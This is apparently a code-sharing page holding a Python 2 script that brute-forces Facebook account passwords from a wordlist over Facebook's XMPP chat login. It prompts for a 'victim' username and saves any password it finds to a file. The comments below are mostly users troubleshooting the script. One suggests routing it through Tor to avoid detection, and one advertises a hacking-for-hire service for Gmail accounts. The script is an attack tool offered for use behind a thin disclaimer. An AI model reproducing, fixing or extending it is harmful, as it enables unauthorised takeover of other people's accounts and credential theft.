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#!/usr/bin/python | |
#Install SleekXMPP & xmpppy Modules | |
#This program is not for children -(18) | |
#This program is only for educational purposes only. | |
#Don't Attack people facebook account's it's illegal ! | |
#If you want to HaCk into someone's account, you must have the permission of the user. | |
#usage:Facebook-brute-force.py [wordlist file] | |
#Coded By Hossam Youssef <[email protected]> ^_^ | |
import xmpp | |
import sys | |
import urllib,re | |
import time | |
import random | |
import datetime | |
def internet_on(): | |
try : | |
data = urllib.urlopen('https://www.google.com') | |
return True | |
except : | |
return False | |
if internet_on() == True: | |
print """ | |
\t _____ _____ _____ _ | |
\t| ___|| ___ \ / __ \ | | | |
\t| |_ | |_/ / ______ | / \/ _ __ __ _ ___ | | __ ___ _ __ | |
\t| _| | ___ \ |______| | | | '__| / _` | / __|| |/ / / _ \| '__| | |
\t| | | |_/ / | \__/\| | | (_| || (__ | < | __/| | | |
\t\_| \____/ \____/|_| \__,_| \___||_|\_\ \___||_| | |
# Private Ghost Password ^_^ | |
# Coded By Hossam Youssef :) | |
# Enjoy Cracking ^_^ | |
# usage: Facebook-brute-force.py [wordlist file] | |
""" | |
login = raw_input("Enter username of victim account : ") | |
password_list = open(sys.argv[1],"r") | |
_login=login+"@chat.facebook.com" | |
print "[+]Connecting To Facebook Terminal Server... " | |
print "[+]Connection Has Been Establishing Successfully To The Server..." | |
print "[+]Negotiating With The Protocol..." | |
print "[+]There was no error with Port..." | |
print "[+]You Are Successfully Connected Enj0y..." | |
print "[+]Attack Has Been Started Be Patient..." | |
for pwd in password_list: | |
sys.stdout.write(".") | |
sys.stdout.flush() | |
pwd=pwd.strip('\n') | |
jid = xmpp.protocol.JID(_login) | |
cl = xmpp.Client(jid.getDomain(), debug=[]) | |
if cl.connect(('chat.facebook.com',5222)): | |
print "!~Injecting Password~!" | |
else: | |
print "[+]Successed[+]" | |
print '[!]',pwd | |
if cl.auth(jid.getNode(), pwd): | |
cl.sendInitPresence() | |
print "[+] -> The Account Has Been Cracked ^__^ "," Password Found ==> : ",pwd | |
file = open(login+".txt", "w") | |
file.write("Email : " +login+ "@facebook.com\n") | |
file.write("Password : " +pwd+ "\n") | |
file.write(str(datetime.datetime.now())) | |
file.close() | |
break | |
cl.disconnect() | |
time.sleep(2) | |
else: | |
print "You have a problem to connect to the Internet :(" |
Won't facebook.com automatically lock you out after a few failed attempts, though?
what username should I use? I tried everything, but no hope
not working.... I try my Facebook accuton with username, email and phone...
I have changed this password_list = open(sys.argv[1],"r") to this password_list = open(sys.argv[0],"r")
which now the script has started working but i have ran into another problem
i started the script like Facebook-brute-force.py [wordlist file] then i entered my username
and the script isnt using from my password list
as you can see where it should be a password to try its " [!] #!/usr/bin/python " instead
[+]Attack Has Been Started Be Patient...
.!Injecting Password!
[!] #!/usr/bin/python
any ideas?
HossamYousef where is WTCW in the script ? cant find it to remove it ?
I have problem when I put the username
Traceback (most recent call last):
File "Facebook-brute-force.py", line 47, in
password_list = open(sys.argv[1],"r")
IndexError: list index out of range
Traceback (most recent call last):
File "Facebook-brute-force.py", line 47, in
password_list = open(sys.argv[1],"r")
IndexError: list index out of range
Not WOrking Try Again Hossam
Thank you for this nice example, not quiet perfect but it shows how it is done! I don't quiet understand the sleep(2) since it slows down the attack a lot. Is this necessary for some reason or just to test purposes?
Injecting the pw is nice but unfortunately this script won't actually detect if it's a correct pw. You can try it with valid credentials and see.
same Problem as sykal can't detect if the pw is correct he just take the next one
mmhh can you give me the lines im new with python comming from java&c++
do you mean this lines?
email = str(raw_input("# Enter |Email| |Phone number| |Profile ID number| |Username| : "))
passwordlist = str(raw_input("Enter the name of the password list file : "))
How to use this can anyone tell me please
This might help you -> https://developers.facebook.com/docs/chat . The api closed.
my python script is running successfully but it cant found password even my wordlist contain my password ...plz tell me what to do
What a command for this script after succes?
why that happen
python faceBrute.py
Traceback (most recent call last):
File "faceBrute.py", line 11, in
import xmpp
ImportError: No module named xmpp
Traceback (most recent call last):
File "Facebook-brute-force.py", line 69, in
if cl.auth(jid.getNode(), pwd):
File "/usr/lib/python2.7/dist-packages/xmpp/client.py", line 225, in auth
while self.SASL.startsasl=='in-process' and self.Process(1): pass
File "/usr/lib/python2.7/dist-packages/xmpp/dispatcher.py", line 303, in dispatch
File "/usr/lib/python2.7/dist-packages/xmpp/dispatcher.py", line 215, in streamErrorHandler
raise exc((name,text))
xmpp.protocol.InternalServerError: (u'internal-server-error', '')
script whenever i run says "you have a problem connecting to the internet" even though my internet is working fine. any solutions?
it dosent work
would be nice if you added SOCK5 Proxy to it, by doing "import tor" and "import socks"
I made a better version of Facebook/Twitter/Instagram Bruteforce script, come check it out.
can you teach me guys on how to run this script thanks
Traceback (most recent call last):
File "C:\Users\user1\Downloads\BruteForce\Facebook-brute-force.py", line 77, in
if cl.auth(jid.getNode(), pwd):
File "C:\Python27\ArcGIS10.2\lib\site-packages\xmpp\client.py", line 209, in auth
while not self.Dispatcher.Stream._document_attrs and self.Process(1): pass
AttributeError: Client instance has no attribute 'Dispatcher'
How to i install ( xmpp) ?
I have got the same problem like @HarflyZone .
[+]Connecting To Facebook Terminal Server... [+]Connection Has Been Establishing Successfully To The Server... [+]Negotiating With The Protocol... [+]There was no error with Port... [+]You Are Successfully Connected Enj0y... [+]Attack Has Been Started Be Patient... .Traceback (most recent call last): File "C:\Users\abdo\Desktop\Facebook-brute-force.py", line 114, in if cl.connect(('chat.facebook.com',5222)): File "C:\Python27\lib\site-packages\xmpp\client.py", line 205, in connect while not self.TLS.starttls and self.Process(1): pass File "C:\Python27\lib\site-packages\xmpp\dispatcher.py", line 303, in dispatch handler'func' File "C:\Python27\lib\site-packages\xmpp\transports.py", line 337, in StartTLSHandler self._startSSL() File "C:\Python27\lib\site-packages\xmpp\transports.py", line 316, in _startSSL tcpsock._sslIssuer = tcpsock._sslObj.issuer() AttributeError: '_ssl._SSLSocket' object has no attribute 'issuer'
fix just install patched xmpppy frome here : https://github.com/ArchipelProject/xmpppy
Thank you so much [email protected], you are so reliable at what you do and I am among the people that got the best services from you just yesterday I emailed you for a GMAIL hack and you came up with my results in less than 30min. All thanks to you once again.
it's a prank, I think
I am having this issue
.Traceback (most recent call last):
File "facebook-cracker.py", line 68, in
if cl.connect(('chat.facebook.com',5222)):
File "build/bdist.linux-i686/egg/xmpp/client.py", line 205, in connect
File "build/bdist.linux-i686/egg/xmpp/dispatcher.py", line 303, in dispatch
File "build/bdist.linux-i686/egg/xmpp/transports.py", line 337, in StartTLSHandler
File "build/bdist.linux-i686/egg/xmpp/transports.py", line 316, in _startSSL
AttributeError: '_ssl._SSLSocket' object has no attribute 'issuer'